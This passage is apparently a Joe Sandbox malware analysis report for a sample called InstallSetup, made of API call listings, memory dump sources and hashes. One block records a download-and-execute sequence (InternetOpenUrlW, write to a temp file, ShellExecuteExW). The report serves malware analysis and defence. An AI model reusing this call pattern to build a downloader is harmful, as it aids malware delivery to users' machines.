                                                                                                • _free.LIBCMT ref: 0097A91D
                                                                                                • _free.LIBCMT ref: 0097A928
                                                                                                • _free.LIBCMT ref: 0097A960
                                                                                                • _free.LIBCMT ref: 0097A967
                                                                                                • _free.LIBCMT ref: 0097A984
                                                                                                • _free.LIBCMT ref: 0097A99C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction ID: ffa8b59ed0275a3624d6c22090a71d0dd17ef718e1b2f63585bbacd7dc46bd22
                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction Fuzzy Hash: 5A316B73604201EFEF20AB38D846B9AB3E8BF80350F11C46AE44DD7651DB75ADA0DB16
                                                                                                APIs
                                                                                                • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                  • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                • _free.LIBCMT ref: 0043A631
                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                • _free.LIBCMT ref: 0043A653
                                                                                                • _free.LIBCMT ref: 0043A668
                                                                                                • _free.LIBCMT ref: 0043A673
                                                                                                • _free.LIBCMT ref: 0043A695
                                                                                                • _free.LIBCMT ref: 0043A6A8
                                                                                                • _free.LIBCMT ref: 0043A6B6
                                                                                                • _free.LIBCMT ref: 0043A6C1
                                                                                                • _free.LIBCMT ref: 0043A6F9
                                                                                                • _free.LIBCMT ref: 0043A700
                                                                                                • _free.LIBCMT ref: 0043A71D
                                                                                                • _free.LIBCMT ref: 0043A735
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                • String ID:
                                                                                                • API String ID: 161543041-0
                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00942C7E
                                                                                                • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00942C94
                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 00942CB0
                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00942CC6
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00942CFF
                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00942D3B
                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00942D58
                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00942DCF
                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 00942DE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                • String ID: <
                                                                                                • API String ID: 838076374-4251816714
                                                                                                • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                • Instruction ID: b44f93a89d5eb89f606ae34c83ae55a8e9f629bcad9cddb4a3d17aae4492a2a2
                                                                                                • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                • Instruction Fuzzy Hash: 20413C7190022DAEEB209F64DC85FEAB7BCFF05745F4081E9B549A2190DE709E858FA4
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0095F228,00000004,00957D87,00000004,00958069), ref: 0095EEF9
                                                                                                • GetLastError.KERNEL32(?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000,?), ref: 0095EF05
                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000), ref: 0095EF15
                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0095EF2B
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF41
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF58
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF6F
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF86
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF9D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                • String ID: advapi32.dll
                                                                                                • API String ID: 2340687224-4050573280
                                                                                                • Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                • Instruction ID: 10e70c8c6998857a8012c7758401c717866c501f083c631b6daaf969a8c6d2c9
                                                                                                • Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
                                                                                                • Instruction Fuzzy Hash: DC21A1B1904700BFDB10AFB59C49A5ABFACEF05B17F004A2AF941E3641CB7C85418BA4
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0095F228,00000004,00957D87,00000004,00958069), ref: 0095EEF9
                                                                                                • GetLastError.KERNEL32(?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000,?), ref: 0095EF05
                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0095F228,00000004,00957D87,00000004,00958069,?,00958799,?,00000008,0095800D,00000000,?,?,00000000), ref: 0095EF15
                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0095EF2B
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF41
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF58
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF6F
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF86
                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095EF9D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                • String ID: advapi32.dll
                                                                                                • API String ID: 2340687224-4050573280
                                                                                                • Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                • Instruction ID: 9866927aa501075179eb1e0a877042170eaa94963ed9babb884fdecc4c4eb435
                                                                                                • Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
                                                                                                • Instruction Fuzzy Hash: 7821B2B1904700BFDB10AF759C49A5ABFECEF06B17F004A26F941D3641CB7C95418BA8
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0095670B), ref: 009524B6
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 009524C4
                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 009524D2
                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0095670B), ref: 00952500
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00952507
                                                                                                • GetLastError.KERNEL32(?,?,?,0095670B), ref: 00952522
                                                                                                • GetLastError.KERNEL32(?,?,?,0095670B), ref: 0095252E
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952544
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00952552
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                • String ID: kernel32.dll
                                                                                                • API String ID: 4179531150-1793498882
                                                                                                • Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                • Instruction ID: d9fd071f1eb91216ad64917c9682db26b6bba66ce7444a1fd3b0928b8e55a6e1
                                                                                                • Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
                                                                                                • Instruction Fuzzy Hash: 4E1182759003107FE711BB766C8AA6B7BAC9E46B137200526F801E3192FB78D90587A9
                                                                                                APIs
                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
                                                                                                  • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                • String ID: pContext$switchState
                                                                                                • API String ID: 3151764488-2660820399
                                                                                                • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                • Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
                                                                                                • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                • Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 00419779
                                                                                                • SafeRWList.LIBCONCRT ref: 00419798
                                                                                                  • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
                                                                                                  • Part of subcall function 00417767: List.LIBCMT ref: 00417782
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
                                                                                                • GetLastError.KERNEL32 ref: 004197B9
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                • String ID: eventObject
                                                                                                • API String ID: 1999291547-1680012138
                                                                                                • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00960C36
                                                                                                • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00960C9D
                                                                                                • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00960CBA
                                                                                                • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00960D20
                                                                                                • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00960D35
                                                                                                • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00960D47
                                                                                                • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00960D75
                                                                                                • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00960D80
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00960DAC
                                                                                                • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00960DBC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                • String ID:
                                                                                                • API String ID: 3720063390-0
                                                                                                • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                • Instruction ID: bf0178fc96d878d48994aa79f2afda9284cb4781768460af88f5c7bd21c9adc8
                                                                                                • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                • Instruction Fuzzy Hash: 2841C330A042089BCF14FFE4D4A67BE77A5AFC2300F1441A9E9465B2C3CB799E09C762
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00972061
                                                                                                  • Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
                                                                                                  • Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9
                                                                                                • _free.LIBCMT ref: 0097206D
                                                                                                • _free.LIBCMT ref: 00972078
                                                                                                • _free.LIBCMT ref: 00972083
                                                                                                • _free.LIBCMT ref: 0097208E
                                                                                                • _free.LIBCMT ref: 00972099
                                                                                                • _free.LIBCMT ref: 009720A4
                                                                                                • _free.LIBCMT ref: 009720AF
                                                                                                • _free.LIBCMT ref: 009720BA
                                                                                                • _free.LIBCMT ref: 009720C8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction ID: 63f012cef65902624201e65791958279687843896eccf89b085fdbd155d0a5b6
                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction Fuzzy Hash: 661132B6620108BFCF45EF64C942E993BA5FF44350B51C1A5FA0C8F262DA71DA60AB90
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00431DFA
                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                • _free.LIBCMT ref: 00431E06
                                                                                                • _free.LIBCMT ref: 00431E11
                                                                                                • _free.LIBCMT ref: 00431E1C
                                                                                                • _free.LIBCMT ref: 00431E27
                                                                                                • _free.LIBCMT ref: 00431E32
                                                                                                • _free.LIBCMT ref: 00431E3D
                                                                                                • _free.LIBCMT ref: 00431E48
                                                                                                • _free.LIBCMT ref: 00431E53
                                                                                                • _free.LIBCMT ref: 00431E61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID: F(@$F(@
                                                                                                • API String ID: 4189289331-2038261262
                                                                                                • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                • Instruction ID: d2feb1d21dd8b7d56b0cf618d03cc50ac4041afd4a38c0b9c203c3cf56bb0a92
                                                                                                • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                • Instruction Fuzzy Hash: 59C10376E04349AFCF16DFA8C841BADBBB4AF4A300F14C095E418A7392C7349A41DB61
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: fB$csm
                                                                                                • API String ID: 1170836740-1586063737
                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                APIs
                                                                                                • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D10
                                                                                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D29
                                                                                                • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                                                                • PMDtoOffset.LIBCMT ref: 00428D4F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: FindInstanceTargetType$Offset
                                                                                                • String ID: Bad dynamic_cast!
                                                                                                • API String ID: 1467055271-2956939130
                                                                                                • Opcode ID: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                • Instruction ID: 5e24beb8d8256b5c5f325d4796605ad5260749f939022e6450d69b98b3545f73
                                                                                                • Opcode Fuzzy Hash: 3d5976511a35a3e55709e8aa5dafb06ef667d3e4312e87b96652b8bae1ee5f2b
                                                                                                • Instruction Fuzzy Hash: CD2137727062259FCB04DF65F902A6E77A4EF64714B60421FF900932C1DF3CE80586A9
                                                                                                APIs
                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0095C6DC
                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0095C700
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0095C711
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0095C71F
                                                                                                  • Part of subcall function 00941370: __Mtx_unlock.LIBCPMT ref: 00941377
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0095C72F
                                                                                                  • Part of subcall function 0095C3EF: __Cnd_broadcast.LIBCPMT ref: 0095C3F6
                                                                                                • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0095C73D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                • String ID: t#D
                                                                                                • API String ID: 4258476935-1671555958
                                                                                                • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                • Instruction ID: 781b1c826fe40f222943cd1c50dac4f63933c80709945443bd6016475d01d174
                                                                                                • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                • Instruction Fuzzy Hash: 7F01A2B6900605ABCB11FBB1CD86F9DB368AF84311F144151FD1497682EBB8AB198792
